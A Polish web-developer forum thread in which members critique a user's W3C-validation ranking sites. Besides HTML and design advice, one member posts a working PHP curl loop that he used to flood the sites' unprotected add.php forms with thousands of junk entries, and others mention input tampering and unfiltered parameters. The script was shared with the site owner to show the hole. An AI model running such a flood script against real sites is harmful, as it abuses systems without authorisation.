Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

2 Stron V   1 2 >  
Reply to this topicStart new topic
> [www] Najlepsza strona
kujawska
post 1.10.2011, 12:25:56
Post #1





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


Najlepsza Strona
Zdopingowany krytycznymi uwagami o WorstSite.pl przedstawiam do oceny stronę propagującą czystość.
Idea i webutility wg. mojej oceny jest trudne do podważenia ale proszę o krytyczne spojrzenie.
Najgorszą stronę przerobiłem na przyjazny i znany wszystkim webmasterom obraz.
Także proszę o nowe spojrzenie.
Go to the top of the page
+Quote Post
nmts
post 1.10.2011, 12:52:06
Post #2





Grupa: Zarejestrowani
Postów: 283
Pomógł: 34
Dołączył: 21.03.2008

Ostrzeżenie: (0%)
-----


Na obu serwisach stronkach można podmienić inputy i umieścić dowolne treści.
Nie oceniam, bo nie uznaje w3c jako wyznacznika, na którego podstawie można stwierdzić, która strona jest lepsza, a która gorsza.

Ten post edytował nmts 1.10.2011, 15:44:01


--------------------
Free Web Tools - narzędzia dla programistów, webdeveloperów i specjalistów seo...
Go to the top of the page
+Quote Post
drozdii07
post 1.10.2011, 13:00:34
Post #3





Grupa: Zarejestrowani
Postów: 254
Pomógł: 39
Dołączył: 6.12.2010
Skąd: localhost

Ostrzeżenie: (0%)
-----


To co kolega wyżej mówił.

na WorstSite masz:
Cytat
Radio Maryja - Katolicki Głos w Twoim Domu
http://www.worstsite.pl
Errors: 999999


Reszty już mi się nie chciało ruszać.. Grafiki i szablonu nie oceniam, bo prawie nie ma nic do oceniania..

Ten post edytował drozdii07 1.10.2011, 13:01:56


--------------------
Wspieram akcję "jQuery i AJAX to nie język programowania"
Go to the top of the page
+Quote Post
qrooel
post 1.10.2011, 15:31:38
Post #4





Grupa: Zarejestrowani
Postów: 306
Pomógł: 42
Dołączył: 25.03.2010
Skąd: Kraków

Ostrzeżenie: (0%)
-----


Żal.


--------------------
Strony WWW: http://arscreo.pl
Go to the top of the page
+Quote Post
kujawska
post 1.10.2011, 16:43:54
Post #5





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


Zabawy z bazą.Czy nie lepiej pokazać swoje dokonania.
Ale chyba walidator mówi Sorry! This language is unknown.
Współczuję invalidom.
Go to the top of the page
+Quote Post
drozdii07
post 1.10.2011, 19:29:19
Post #6





Grupa: Zarejestrowani
Postów: 254
Pomógł: 39
Dołączył: 6.12.2010
Skąd: localhost

Ostrzeżenie: (0%)
-----


Po pierwsze, o czym ty mówisz, bo nie ogarniam. Po drugie, 'invalidom'.. wtf ?


--------------------
Wspieram akcję "jQuery i AJAX to nie język programowania"
Go to the top of the page
+Quote Post
lukasz91
post 1.10.2011, 19:51:21
Post #7





Grupa: Zarejestrowani
Postów: 149
Pomógł: 7
Dołączył: 6.01.2010
Skąd: Opole Lubelskie

Ostrzeżenie: (0%)
-----


A jaki sens mają tego typu serwisy to ja nie mam pojęcia ...


--------------------
Go to the top of the page
+Quote Post
kujawska
post 1.10.2011, 20:20:41
Post #8





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


INVALIDdom HTMLowym takim co języka nie znają a strony jakieś robią
szczęśliwi bo przegladarki te głupoty wyświetlają.
Taka przeglądarka ona zdaje sobie sprawę z analfabetyzmu i usiłuje to naprawić.
Tłumaczy te wypociny na HTML .Pewnie,że dobrze mieć tłumacza.
Ale Ty jesteś Webmasterem,więc postaraj się nie być analfabetą.
Moje strony tylko to mają pokazywać.
Zauwazyłes błąd, pokaż i pomóż w usunięciu a nie pluj bo Ci nie pasuje.

Go to the top of the page
+Quote Post
Michalko
post 1.10.2011, 21:35:48
Post #9





Grupa: Zarejestrowani
Postów: 14
Pomógł: 1
Dołączył: 25.09.2011

Ostrzeżenie: (0%)
-----


Sprawdź w słowniku english - polski co znaczy słówko "invalid".

Pokaż może jakąś swoją dobrą i na poziomie stronę zamiast walczyć z wiatrakami. Akurat taka strona "worstsite.pl" jest o dupę rozczaść. Co z tego, że są jakieś błędy, jak poważne seriwsy mają w kodzie takie rzeczy o jakich Ty nawet nie masz pojęcia. A walidator marudzi bo tak go ktoś napisał i tyle. Wiadomo, standardów należy się trzymać i ja to osobiście rozumiem i również propaguje.
OK, są jakieś nawet stronki, dosłownie stronki, 4 podstrony a błędów setki. No dobra autor dał dupy. I co w związku z tym? Napisz do niego, żeby to poprawił jak chcesz zbawiać Świat w ten sposób. Inaczej to na nic nie wpływasz. Powiedz mi czemu Twoje stronki "najlepsza strona" i "najgorsza strona" mają służyć? Bez urazy ale są śmieciami w Internecie, które nie mają jakiegokolwiek zastosowania. Jak ktoś będzie chciał sprawdzić ile dana strona ma errorów (albo ich nie ma) w walidatorze W3C to sobie sama sprawdzi, a tak to będziesz chyba sam sobie tą stronę prowadził, sam odwiedzał i sam sobie komentował.

Weź się lepiej za coś pożytecznego i nie marnuj czasu sobie i innym.

[edit] Jak Ty się nawet nie przejmujesz tym, że można manipulować danymi na Twojej stronie to ja nie wiem z czym do ludzi blink.gif Ogarnij się człowieku!

Ten post edytował Michalko 2.10.2011, 10:23:17
Go to the top of the page
+Quote Post
wookieb
post 2.10.2011, 10:24:41
Post #10





Grupa: Moderatorzy
Postów: 8 989
Pomógł: 1550
Dołączył: 8.08.2008
Skąd: Słupsk/Gdańsk




Dobra koniec. Nie umiesz przyjąć krytyki i rozmawiać po ludzku, więc to nie jest miejsce dla Ciebie. Zamykam.


--------------------
Go to the top of the page
+Quote Post
Cysiaczek
post 6.10.2011, 07:38:45
Post #11





Grupa: Moderatorzy
Postów: 4 465
Pomógł: 137
Dołączył: 26.03.2004
Skąd: Gorzów Wlkp.




Otwieram po konsultacji z zainteresowanymi. Ostrzegam, że wywalimy temat jeśli przerodzi się w flejm, a winowajców nagrodzimy.


--------------------
To think for yourself you must question authority and
learn how to put yourself in a state of vulnerable, open-mindedness;
chaotic, confused, vulnerability, to inform yourself.
Think for yourself. Question authority.
Go to the top of the page
+Quote Post
ixpack
post 6.10.2011, 08:55:11
Post #12





Grupa: Zarejestrowani
Postów: 248
Pomógł: 55
Dołączył: 1.06.2010
Skąd: mam to wiedzieć?

Ostrzeżenie: (0%)
-----


Ok... Napiszę Tobie tak: Wyobraź sobie, że Twój serwis jest ważny. Wczoraj zobaczyłeś, że głupi skrypt curl + pętla doda Ci wiele wiele wiele wpisów - mi zajęło to 5 minut na obie strony.
A wyobraź sobie prawdziwego hackera... Pomyśl czy każdy POST jest bezpieczny? Użytkowników traktuj jak POTENCJALNYCH wrogów.
Głupie sprawdzenie sesji przed dodaniem postu do db już by uchroniło Twój serwis. Jakiś hash, cokolwiek! Albo automatyczne dodanie zmiennych, które otrzymasz od w3c bez przesyłania POST'em danych.

Bezpieczeństwo to nie tylko Twoja strona i kod. To również zabezpieczenie serwera... Np. autoban dla botów etc. LOGI - abyś wiedział "skąd"... Mi blog niedawno shackowali - ale nic tam nie było (hasło do wp i stara jego wersja wink.gif), a co jakbym nie miał backup'u?

Szata graficzna - jest bardzo ważna, bo ludzie właśnie na nią zwracają uwagę! Nie na ilość błędów walidatora! Zbuduj sobie piramidę priorytetu, w niej umieść (nie wg. Ciebie - a wg. klientów) wszystkie czynniki, które wpłynąć mogą na decyzje klienta, który zamierza np. kupić coś on-line. NA PEWNO walidacja będzie nisko nisko.
Nie każdy ma zdolności graficzne - ja nie mam ich w ogóle. Dla takich jak "my" są freelancerzy - designerzy, płatne ikony, template'y etc.

Przepraszam za dodanie wielu rekordów do Twojej bazy - wykorzystałem Twoją stronę do tego. Zrobiłem to ponieważ dla Ciebie bezpieczeństwo nie jest ważne. Ja nie znam się na tym w ogóle... Jak chcesz to wkleję Tobie kod (jeżeli nie wiesz o co mi chodziło wyżej) i zobaczysz jak łatwo jest manipulować Twoją stroną.

Co do samego pomysłu - ja jestem na tak dla valid sites -> dodatkowa sława dla stron, dodatkowy link w internecie zawsze będzie na +. Co do worstsite - jestem na nie. Krytyka to nie tylko wytykanie błędów, ale i konstruktywne rady, które pomogą komuś zmienić dany produkt na "lepsze". Ty kończysz swoje rady na "jesteś analfabetą, invalidą html'owym". Jeszcze jedno BARDZO ważne. Wychodzi HTML5 - poczytaj o nim i zobacz jak ważny jest doctype czy zamykanie <p>.

Mam nadzieję, że nie przysporzyłem Ci nerwów - nie to miałem na myśli, wysłałbym powyższy tekst przez PW, ale myślę że może to się jeszcze komuś przydać.


--------------------
Łatwo jest być odważnym za murami własnego zamku.
Go to the top of the page
+Quote Post
phpion
post 6.10.2011, 09:47:55
Post #13





Grupa: Moderatorzy
Postów: 6 070
Pomógł: 860
Dołączył: 10.12.2003
Skąd: Dąbrowa Górnicza




1. Wygląd na chama wzięty z walidatora W3C.
2. Logo komiczne - czcionka brzydka i do tego ten "r" smile.gif wygląda jak imitacja ®
3. Logo powinno być klikalne i prowadzić do strony głównej.
4. Przycisk dodawania strony nie działa.
5. Nie filtrujesz danych przekazywanych do bazy (http://www.validsite.pl/paging.php?p=dupa). Błąd się na szczęście nie wyświetla, ale jednak występuje.
6. Lista stron to nie są dane tabelaryczne.
Go to the top of the page
+Quote Post
kamil4u
post 6.10.2011, 12:25:25
Post #14





Grupa: Zarejestrowani
Postów: 2 350
Pomógł: 512
Dołączył: 4.01.2009
Skąd: Wrocław / Świdnica

Ostrzeżenie: (0%)
-----


Cytat
Ale Ty jesteś Webmasterem,więc postaraj się nie być analfabetą.
Moje strony tylko to mają pokazywać.
Zauwazyłes błąd, pokaż i pomóż w usunięciu a nie pluj bo Ci nie pasuje.

Nie mam zbyt wiele czasu, więc ocenię kod http://www.validsite.pl/ :
1.
Kod
<div id="hp">
<span id="title">Valid Site Ranking</span>
<br>
<span id="naj">Najlepsze strony w polskim Internecie.Czyje to dzieło?</span>
</div>

Tu powinno się obejść bez <div>-a o id="hp", a zamiast <span> powinieneś użyć <h1> i <h2> + odpowiedni CSS

2. Zdecydowanie za dużo atrybutów id. Znając CSS można z łatwością dostać się do większości elementów pozbywając się zbytecznych id.
3.
Kod
<div id="green"> These documents have been successfully checked </div>

Tu też powinno być odpowiednie H(x)
4. Z div-em o id 'grat' to samo
5. <tbody> powinieneś użyć raz, a w Twojej tabeli nawet wcale.
6. Robienie pustego <tr>, aby zrobić przerwę to wstyd
7. Zastanowiłbym się nad zrobieniem listy zamiast tabelki, ale to wedle gustu/indywidualnych preferencji
8.
Kod
<div id="footer">
<span>
&nbsp;&copy;&nbsp;validtsite.pl
<a id="kon" href="mailto:worstsite@wp.pl">Kontakt</a>
<a id="reg" href="java script:ontop('regulamin')">Regulamin</a>
<a href="http://www.facebook.com/pages/WorstSitepl/216114041778225?sk=wall">
<a href="http://validator.w3.org/check?uri=referer">
<a href="http://jigsaw.w3.org/css-validator/check/referer">
<img id="css" alt="Poprawny CSS!" src="css.png">
</a>
</span>
</div>

Nie użyłbym tutaj <span>-a i znów dużo niepotrzebnych id.
9. kod uporządkuj- ostępy, wcięcia, itd.

Podsumowanie:
- za dużo id
- za mało elementów przeznaczonych zgodnie z ich przeznaczeniem np. nagłówków
- często dużo nie potrzebnych elementów np. <span> czy <div>
- warto też używać atrybutów title czy alt

Generalnie nie jest źle(pod względem poprawności HTML). Napisałem to po to, abyś zwrócił uwagę, że nawet jak masz "zielony" kod to wcale nie znaczy, że jesteś mistrzem HTML czy CSS. Trzeba jeszcze używać odpowiednich znaczników do odpowiednich celów i starać się pisać jak najbardziej czytelny kod.

Pozdrawiam i życzę sukcesu.


--------------------
Go to the top of the page
+Quote Post
kujawska
post 6.10.2011, 19:39:11
Post #15





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


Dziękuję ixpack i kamil4u.Będę poprawiał oczywiście bo widzę te wskazywane przez Was niedociagnięcia.
ixpack proszę o ten kod.Nie zabezpieczałem rzeczywiście ale powiem szczerze,że spodziewałem się włamania.
Miałem kopię bazy a później wyłączyłem add.Byłem ciekaw co już wiesz i jak daleko się posuniesz.
Jestem tylko "amatormaster" i lubię samodzielnie poprawiać.Może w sobotę odblokuję dodawanie i jeśli masz czas
to poznęcaj się.
phpion informuję,że podobieństwo do W3C jest celowe a "R" udaje Ranking.

Go to the top of the page
+Quote Post
ixpack
post 7.10.2011, 08:17:53
Post #16





Grupa: Zarejestrowani
Postów: 248
Pomógł: 55
Dołączył: 1.06.2010
Skąd: mam to wiedzieć?

Ostrzeżenie: (0%)
-----


kujawska - nie jestem hacker, KAŻDY mógłby to zrobić w 5 minut.

1-sza rzecz - ja użyłem wtyczki data tamper - wpisz w wyszukiwaniu wtyczek firefox'a. Jest masa podobnego typu softu. Preparujesz input - dlatego też validacja js nie ma sensu jeżeli chodzi o bezpieczeństwo. Bardzo łatwo zerknąć na to jak nazwałeś input'y. Takie narzędzia służą nie do "hackowania" - ale do ochrony przed tym. Sam tego używam i preparuję input do swoich skryptów.
2-ga prosta pętla na curl:
  1. $ch = curl_init();
  2. curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  3.  
  4. $url = 'http://www.validsite.pl/add.php';
  5. $ur = 'url';
  6. $ti = 'title';
  7. $de = 'description';
  8.  
  9. curl_setopt($ch, CURLOPT_URL, $url);
  10. curl_setopt($ch, CURLOPT_POST, 3);
  11.  
  12. for ($indexo = 0; $indexo < 1000; $indexo++) {
  13. for ($index = 0; $index < 1000; $index++) {
  14. $requestString = "ur=$ur+$index&ti=$ti+$index&de=$de+$index";
  15. curl_setopt($ch, CURLOPT_POSTFIELDS, "$requestString");
  16. $serverResponse = curl_exec($ch);
  17. }
  18. }
  19.  
  20. $xurl= "http://www.worstsite.pl/add.php";
  21. curl_setopt($ch, CURLOPT_URL, $xurl);
  22. curl_setopt($ch, CURLOPT_POST, 4);
  23. for ($indexo = 2; $indexo < 1000; $indexo++) {
  24. $requestString = "ur=http%3A%2F%2Fwww.worstsite.pl/?id=".$indexo."&er=9999+&ti=Worst+Site+Ranking&de=Toplista.Ranking+najgorszych+stron+WWW+w+polskim+Internecie+czyli+o+rados
    nej+twórczości+webmasterów"
    ;
  25. curl_setopt($ch, CURLOPT_POSTFIELDS, "$requestString");
  26. $serverResponse = curl_exec($ch);
  27. }


Oczywiście kod jest "na odwal", ale pokazuje gdzie jest problem. KAŻDY może dodać do bazy co zechce... Teoretycznie dodamy skrypt javascript, który coś tam brzydkiego robi... Wystarczy abyś post, który ktoś wprowadza zapisał sobie np. w sesji albo zmiennej, którą dodasz do bazy jeżeli walidator zwróci np. 0 błędóe. Wiele jest rozwiązań - ile ludzi tyle rozwiązań.

Na prawdę nie znam się na hackingu. Kiedyś przejąłem konto na khanwars (gra online), ale tylko dlatego, że koleś z top listy miał hasło login123 =] i na głupiego trafiłem... Nie jestem mistrzem zabezpieczeń, ale TU na tym forum jest MASA materiału o bezpieczeństwie, atakach xss etc.
Musisz być świadom, że nie ważne jak zabezpieczysz stronę to i tak znajdzie się ktoś, kto to może rozwalić - dlatego backup jest koniecznością.
Pozdr. i życzę sukcesu z validsite (worstsite - tam rację bytu tłumaczyłoby jakbyś dodawał strony niebezpieczne dla usera, ale nie po "złości" bo ma kilka błędów html. OK radiomaryja to zło, bo pierze mózgi wink.gif)


--------------------
Łatwo jest być odważnym za murami własnego zamku.
Go to the top of the page
+Quote Post
kujawska
post 15.10.2011, 13:42:00
Post #17





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


Poprawiłem bezpieczeństwo bazy. Dodałem [ostatnio dodana strona].
Sądzę, że taka strona pokazująca niechlujstwo językowe jest bardzo potrzebna.
Go to the top of the page
+Quote Post
adbacz
post 22.10.2011, 16:20:07
Post #18





Grupa: Zarejestrowani
Postów: 532
Pomógł: 24
Dołączył: 15.04.2011
Skąd: Kalisz

Ostrzeżenie: (0%)
-----


Użytkowniku kujawska - Przed przeczytaniem całego tematu, najpierw "zaglądnąłem" na tą stronkę i pierwsze co zrobiłem to zamknąłem okno przeglądarki. Dlaczego? Bo mnie odstraszył jej wygląd. Jesli już uważasz, że " taka strona pokazująca niechlujstwo językowe jest bardzo potrzebna" to chociaz zrób ją tak, by nie odstraszała potencjalnych uzytkowników (o ile można o takowych mówić). Sam nie jestem jakimś super webmasterem, ale powiedz mi, czy ważne jest poprawne walidowanie strony przez w3c czy strona, która wyświetla sie na 75% przeglądarek poprawnie (ogólnie, i tych najnowszych i tych sprzed 2-3 lat bo takich też ludzie używają jeszcze)?

Idąc Twoim tokiem myślenia, jak w przyszłości zrobisz stronę dla klienta to co mu powiesz jak zapyta, dlaczego na FF się wyświetla poprawnie a na IE już nie? Bo głównym założeniem była poprawna walidacja i to nie Twoja wina że IE tak wyświetla strony? Już nie wspomnę o jakości wizualnej takiej strony...

Tak nawiasem, to też kiedyś byłem "początkujący" i wszystkim chciałem pokazać swoje wypociny, bez względu na to jak one wyglądały. Nie wiem czy Ty (użytkowniku) też taki jesteś, w sensie początkujący, ale nawet teraz, po 2 latach, jak coś zrobię, to nie jestem nigdy do końca pewny, czy to so zrobiłem jest dobrze zrobione. Zawsze mam przeświadczenie, że coś mogłem zrobić lepiej... A jeśli ktoś na forum daje Ci jakies uwagi i nie jest to napisane wyśmiewczym tonem a bardzo poważnie, to warto się do tych wskazówek dostosować.

Pozdrawiam...
Go to the top of the page
+Quote Post
kujawska
post 22.10.2011, 17:40:47
Post #19





Grupa: Zarejestrowani
Postów: 116
Pomógł: 2
Dołączył: 19.02.2008

Ostrzeżenie: (50%)
XXX--


adbacz
Wygląd strony worstsite.pl i validsite.pl odstrasza lub pociesza.
Te strony pokazują pozytywne i negatywne strony webmasterskiej twórczości dobrej i złej.
Mają być wyrzutem lub satysfakcją.One chcą mówić o tym,że jak coś piszesz to pisz porządnie.
Możesz się wymądrzać jakiś webdesignem albo webusability ale to nie zastąpi analfabetyzmu.
Doceniam Twój głos.Krytyczny bo takich jest większość ale przynajmniej przyznajesz,że nie jest Ci obojętna jakość.
Mógłbym zapytać o Twoje dokonania.To proste.Zobacz siebie na zielonej stronie.
Za prześmiewczy ton przepraszam,nie wszystkich dotyczył.
Temat jest obszerny a te moje strony pewnie niedoskonałe.
Pozdrawiam.
Jest dla mnie oczywiste,ze nawiązanie do W3C jest dla wszystkich webmasterów oczywiste.

Ten post edytował kujawska 22.10.2011, 17:56:46
Go to the top of the page
+Quote Post
Twist
post 22.10.2011, 18:15:11
Post #20





Grupa: Zarejestrowani
Postów: 174
Pomógł: 11
Dołączył: 12.10.2008
Skąd: Dublin

Ostrzeżenie: (0%)
-----


Musisz się nauczyć, że poprawny kod html to niewielki procent całej strony www. Usera który wchodzi na stronę www, nie interesuje, czy każdy <img> ma wpisane alty, tylko

- zawartość merytoryczna
- design
- accesibility i usability
- bezpieczenśtwo danych

Przyjmijmy taką sytuację

Strona A
Wyświetla się poprawnie we wszystkich przeglądarkach, które z ponad pięcioprocentowym udziałem na rynku
Ma 100 errorów - klient wprowadza newsy WYSYWIgiem.

Strona B
Działa tylko w FF i Chrome.
Valid HTML.

Która jest lepsza?

Poza tym nadużywasz pojęcia "analfabetyzm". Przeczytaj dokładnie jego znaczenie.

btw. "webmasterzy nie gęsi, swó język mają" - omg




Go to the top of the page
+Quote Post

2 Stron V   1 2 >
Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 25.04.2024 - 14:27